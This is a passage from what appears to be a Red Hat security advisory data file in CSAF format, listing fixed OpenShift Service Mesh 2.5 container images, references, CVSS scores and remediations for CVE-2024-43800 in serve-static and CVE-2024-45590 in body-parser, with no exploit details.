"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", 